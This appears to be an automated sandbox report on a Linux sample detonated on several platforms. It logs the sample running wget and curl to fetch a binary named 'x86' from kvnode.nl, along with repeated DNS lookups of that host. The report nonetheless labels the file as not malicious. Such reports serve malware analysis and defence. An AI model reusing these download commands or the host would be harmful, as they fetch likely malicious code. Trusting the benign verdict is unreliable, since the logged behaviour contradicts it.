Analysis Overview
SHA256
c8ae520447108ffa11af9bce8344cb86f3c40df32efe07f09ad68761880595ee
Threat Level: No (potentially) malicious behavior was detected
The file a9e0e32ba445b4d04f34209ebbf41445_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-06-14 13:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 13:20
Reported
2024-06-14 13:22
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
Processes
/tmp/a9e0e32ba445b4d04f34209ebbf41445_JaffaCakes118
[/tmp/a9e0e32ba445b4d04f34209ebbf41445_JaffaCakes118]
/usr/bin/wget
[wget http://kvnode.nl/x86]
/usr/bin/curl
[curl -O http://kvnode.nl/x86]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-14 13:20
Reported
2024-06-14 13:22
Platform
debian9-armhf-20240418-en
Max time network
149s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
| US | 1.1.1.1:53 | kvnode.nl | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-14 13:20
Reported
2024-06-14 13:20
Platform
debian9-mipsbe-20240611-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-14 13:20
Reported
2024-06-14 13:20
Platform
debian9-mipsel-20240418-en